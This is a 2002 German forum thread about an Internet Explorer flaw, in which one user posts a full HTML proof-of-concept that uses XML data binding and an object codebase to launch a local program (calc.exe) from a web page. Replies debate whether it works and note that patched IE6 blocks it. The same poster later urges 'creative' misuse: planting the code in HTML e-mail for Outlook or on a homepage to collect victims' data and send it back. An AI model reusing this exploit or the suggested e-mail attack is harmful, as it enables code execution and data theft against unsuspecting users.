Per IE jedes Programm Starten!!!

Dieses Thema im Forum "Browser" wurde erstellt von Azubi, 5. März 2002.

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Azubi

    Azubi Kbyte

    Registriert seit:
    13. Juli 2001
    Beiträge:
    234
    Kennt Ihr das schon??? Jedes beliebige Programm ausführen per IE x!?

    <html>
    <head>
    <title>Running "c:/winnt/system32/calc.exe"..</title>
    <link rel="stylesheet" href="../sec.css">
    </head>
    <body>
    Running "c:/winnt/system32/calc.exe"..
    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
    <security>
    <exploit>
    <![CDATA[
    <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
    ]]>
    </exploit>
    </security>
    </xml>
    </body>
    </html>

    http://security.greymagic.com/adv/gm001-ie/
    http://www.heise.de/newsticker/data/pab-04.03.02-001/
    [Diese Nachricht wurde von Azubi am 08.03.2002 | 12:55 geändert.]
     
  2. frederic

    frederic Halbes Megabyte

    Registriert seit:
    25. November 2001
    Beiträge:
    901
    Da kommen wir der Sache schon näher: ein Exploit von jemand, der offensichtlich wirklich was davon versteht, und nix anderes. Trotzdem hats bei mir nicht gefunzt, und die Links wären schon bei deinem ersten Posting fällig gewesen.

    Gruß
    frederic
     
  3. Schugy

    Schugy Viertel Gigabyte

    Registriert seit:
    10. Juli 2001
    Beiträge:
    2.587
    s den ja nicht.

    Und spätestens bei C:\ gibt\'s einen Fehler.
    \ gibt es in Unix-Pfaden nicht. Nur als Zeichen, wenn man an der konsole eine Leerzeile im Dateinamen kenntlich machen muss :-)

    Unix ist die totale Einheitlichkeit

    file://pfad
    http://
    htttps://
    ftp://

    Wie weit aber Java-Script irgendetwas Ausführen kann in den diversen Browsers, wenn man die Pfade anpasst, wüsste ich gern mal.

    Ich hoffe ja,dass ohne manuelles Eingreifen nichts passieren kann.

    MfG

    Schugy
     
  4. Azubi

    Azubi Kbyte

    Registriert seit:
    13. Juli 2001
    Beiträge:
    234
    Hier die Links zu Thema:
    http://security.greymagic.com/adv/gm001-ie/
    http://www.heise.de/newsticker/data/pab-04.03.02-001/
     
  5. frederic

    frederic Halbes Megabyte

    Registriert seit:
    25. November 2001
    Beiträge:
    901
    Daß man damit unter gewissen Voraussetzungen jedes Programm starten kann, bezweifle ich nicht.

    Allerdings hab ich das Programm, wie schon angedeutet, als Quelltext im CT-Browsercheck gefunden. Als Testprogramm für Sicherheitslücken ist es offensichtlich auch konzipiert; die Bezeichnung *exploit* für den wesentlichen Funktionsteil zeigt das mehr als deutlich. Der von dir benannte Link ist nur die Startseite bei Heise und damit als Fundstelle ohne Aussagekraft.

    Interessant ists allemal. Da der Exploit aber nicht auf deinem Mist gewachsen ist, wärs geboten gewesen (und für die Leser hier auch sinnvoll), daß du die Quelle genannt hättest.

    Übrigens, zur allgemeinen Beruhigung: ein IE6 mit aktuellen Patches läßt das Starten nicht zu. Die Sicherheitslücke ist also behoben. Möge sich jeder Leser also sein eigenes Urteil bilden.

    Gruß
    frederic
     
  6. Azubi

    Azubi Kbyte

    Registriert seit:
    13. Juli 2001
    Beiträge:
    234
    Praktische Funktion:
    Eine HTML eMail mit entsprechende Code in z.B. Outlook einbinden.
    Die Daten, die man haben möchte in eine .txt schreiben lassen und zurück schicken.
    Seid mal kreativ *g* z.B. eine HP bauen die den Code enthält......
     
  7. Azubi

    Azubi Kbyte

    Registriert seit:
    13. Juli 2001
    Beiträge:
    234
    Hi, als erstes muss ich mal sagen das ich auf diese "Funktion" gestossen bin bei http://www.heise.de
    Ich dachte mir mal ich Poste diesen Artikel in die PC-Welt, da ich diesen Artikel hier noch nicht endecken konnte und da es sich um ein grosses Problem handelt. Die "Lücke" ist seid ca. einem Jahr bekannt!!!
    Es funktioniert bei jedem IE Browser, ganz egal ob ob JavaScribt oder Active X an oder aus ist!!!
    Man kann damit JEDES Programm Starten!!! Man muss nur den absoluten Pfad angeben.Die entsprechende ID muss NICHT verändert werden! Ich würde sagen das es keine "Lücke" ist da man in XML Programme über den Code Local starten kann!
    Oder was meint Ihr Dazu?
    MFG Christopher
     
  8. frederic

    frederic Halbes Megabyte

    Registriert seit:
    25. November 2001
    Beiträge:
    901
    Daß du das aus dem CT-Browsercheck abgekupfert hast, find ich weniger klasse.

    Gruß
    frederic
     
  9. kalweit

    kalweit Hüter der Glaskugel

    Registriert seit:
    18. April 2000
    Beiträge:
    31.486
    Find ich klasse.

    3 Fragen dazu:

    - Ist das eine Sicherheitslücke oder eine mögliche Funktion des IE?
    - Gibt es die Möglichkeit das Ganze auf Basis der Registry auszuführen (sprich das er sich den Ordner zum Programm selber sucht)?
    - Wie übergebe ich eine Datei zum öffnen mit dem entsprechenden Programm (Datei online - nicht lokal)?

    Gruss, Matthias
     
  10. djobst

    djobst Kbyte

    Registriert seit:
    19. September 2000
    Beiträge:
    371
    ich versteh gar nix... ;(
     
Status des Themas:
Es sind keine weiteren Antworten möglich.

Diese Seite empfehlen